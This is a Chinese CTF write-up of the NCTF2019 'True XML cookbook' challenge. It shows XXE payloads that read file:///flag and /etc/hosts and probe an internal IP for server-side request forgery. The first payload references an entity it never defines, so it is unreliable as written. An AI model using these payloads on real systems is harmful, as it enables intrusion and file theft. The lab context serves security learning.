[NCTF2019]True XML cookbook

本文介绍了在[NCTF2019]TrueXMLcookbook挑战中,如何利用XML External Entity (XXE)漏洞进行内网探测和密码爆破的尝试。作者首先尝试直接爆破密码,然后利用XXE漏洞读取本地文件以探测内网存活主机,最后通过修改实体地址尝试攻击内网IP。虽然未能直接获取密码,但展示了XXE漏洞的攻击手段和思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[NCTF2019]True XML cookbook

爆破

抓包爆破,想直接爆出密码。
然鹅我天真了。

XXE漏洞

这里存在XXE漏洞,利用脚本直接打:
构造:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

在这里插入图片描述

没有哦·····

打内网

XXE漏洞可以直接攻击内网用户,先查看内网存活主机:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述
看到了本机ip,但是不知道存活ip。
可以用BP爆破(但是看到wp上是说ip最后一位为11):

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值